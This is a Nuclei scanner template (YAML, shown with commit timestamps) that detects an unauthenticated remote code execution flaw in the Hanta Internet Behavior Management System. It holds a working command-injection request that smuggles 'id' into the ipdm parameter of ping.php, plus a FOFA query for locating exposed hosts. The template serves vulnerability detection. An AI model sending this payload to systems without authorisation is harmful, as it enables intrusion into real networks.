nuclei-templates/http/vulnerabilities/other/hanta-rce.yaml

34 lines
908 B
YAML
Raw Normal View History

id: hanta-rce
2023-08-18 05:17:32 +00:00
info:
name: Hanta Internet Behavior Management System - Remote Code Execution
2023-08-18 05:17:32 +00:00
author: momika233
severity: high
2024-01-02 15:45:12 +00:00
description: Hanta Internet Behavior Management System is vulnerable to RCE.
2023-08-18 05:17:32 +00:00
metadata:
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-18 05:17:32 +00:00
fofa-query: app="汉塔科技上网行为管理系统"
2023-08-18 08:40:51 +00:00
tags: hanta,rce,unauth
2023-08-18 05:17:32 +00:00
http:
2023-08-18 05:17:32 +00:00
- method: GET
path:
- "{{BaseURL}}/dgn/dgn_tools/ping.php?ipdm=2;id;"
2023-08-18 05:17:32 +00:00
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
- type: word
part: header
words:
- "text/html"
2023-08-18 05:17:32 +00:00
- type: status
status:
- 200
# digest: 4a0a004730450221008d7467d2240f06e194043ebaef9101297d5bd24253ec911c56957098c6e8aefa0220765187478b0ed78c65217dbe4b80b4808f937630ea5b96e70e9f9fd71a8b18cb:922c64590222798bb761d5b6d8e72950